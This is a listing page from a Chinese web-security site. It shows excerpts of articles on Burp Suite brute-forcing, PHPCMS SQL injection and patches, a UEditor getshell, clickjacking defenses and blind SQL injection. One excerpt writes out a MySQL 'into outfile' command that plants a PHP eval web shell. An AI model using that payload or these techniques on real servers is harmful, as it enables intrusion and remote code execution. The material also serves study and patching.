安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
逆向工程 ExploitS 系统文档 移动安全 硬件安全 无线安全WEB安全 DataBase 神兵利刃 网络安全 编程茶楼 WooYun
返回首页
当前位置: 安云网 > 技术关注 > WEB安全 >
  • [WEB安全] Burpsuite之Http Basic认证爆破 日期::2018-08-27点击:131 好评:0

    有的时候经常遇到401.今天正好朋友问怎么爆破,也顺便记录一下 怕忘记了 referer:http://www.2cto.com/Article/201303/194449.html 看到Burpsuite上的几篇文章,如: Burpsuite教程与技巧之HTTP brute暴力破解 AuthTrans(原创工具)+BurpSuite的暴力美学-破解...

  • [WEB安全] phpcms v9.6 注入漏洞详细分析 日期::2018-08-23点击:109 好评:0

    搭建环境,我在本地搭建域名为 www.joke33.com 的测试环境。 打开 burpsuite,进行拦截。 打开火狐浏览器,访问有漏洞的网站。 http://www.joke33.com/index.php 在 burpsuite 下可以看到拦截到的数据包,然后选择 repeater 进行重放。 修改数据包...

  • [WEB安全] phpcms v9 各种注入漏洞补丁 日期::2018-08-23点击:187 好评:0

    1、宽字节注入漏洞 /phpcms/modules/pay/respond.php位置约16行 原来代码 $payment = $this-get_by_code($_GET[code]); 替换为 $payment = $this-get_by_code(mysql_real_escape_string($_GET[code])); 2、phpcms注入漏洞 /phpcms/modules/poster/poster.php位置约221行 if ($_GET[group]) { 之...

  • [WEB安全] PHPCMS V9.6.2 SQL注入漏洞分析 日期::2018-08-23点击:231 好评:0

    作者: 0r3ak@0kee Team 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 【漏洞分析】PHPCMS V9.6.1 任意文件读取漏洞分析(含PoC,已有补丁) 前言 通过这篇文章的分析: http://bobao.360.cn/learning/detail/3805.html ,详细讲述...

  • [WEB安全] UEditor .net版本 getshell 日期::2018-08-22点击:143 好评:0

    发布时间:2018-08-03 公开时间:2018-08-21 漏洞类型:逻辑漏洞 危害等级:高 漏洞详情 https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs Crawler方法对source[]的检查仅仅是一个ContentType if(response.ContentType.IndexOf(image)==-1){St...

  • [WEB安全] 点击劫持漏洞解决( Clickjacking: X-Frame-Options header missing) 日期::2018-08-20点击:198 好评:0

    X-Frame-Options HTTP 响应头, 可以指示浏览器是否应该加载一个 iframe 中的页面。 网站可以通过设置 X-Frame-Options 阻止站点内的页面被其他页面嵌入从而防止点击劫持 方法一:常见的比如使用js,判...

  • [WEB安全] Web服务器点击劫持(ClickJacking)的安全防范 日期::2018-08-09点击:172 好评:0

    一.介绍 ClickJacking即点击劫持,是一种将恶意代码经过处理使其变成透明、不可见的iframe,并将其覆盖在一个网页上,然后诱使用户在该网页上进行点击操作。通过改变iframe的在页面的位置,可以诱使用户正好点击我们设置好的透...

  • [WEB安全] mysql的outfile设置一句话 日期::2018-05-21点击:261 好评:0

    CreateTABLEa(cmdtextNOTNULL);InsertINTOa(cmd)VALUES(?phpeval($_POST[cmd]);?);selectcmdfromaintooutfileG:/xampp/phpmyadmin/phplogs.php;DropTABLEIFEXISTSa;flushlogs;...

  • [WEB安全] 解决DEDECMS历史难题--找后台目录 日期::2018-02-27点击:204 好评:0

    利用限制 仅针对windows系统 进入正题 首先看核心文件common.inc.php 大概148行左右 if($_FILES){require_once(DEDEINC./uploadsafe.inc.php);} uploadsafe.inc.php if(preg_match(#^(cfg_|GLOBALS)#,$_key)){exit(Requestvarnotallowforuploadsafe!);}$$_key=$_FILES[$_key][tmp_name];//获取t...

  • [WEB安全] 盲注学习总结 日期::2018-02-03点击:196 好评:0

    sql注入中的盲注的几种类型 1.基于时间延时注入 基于时间的手工盲注一般都是通过二分法或逐位法确定范围获取目标值。大大缩小了请求数。 通过控制,获取响应时间来判断目标值的正确性。使用大量情况,在纯盲情况下成功率...

推荐内容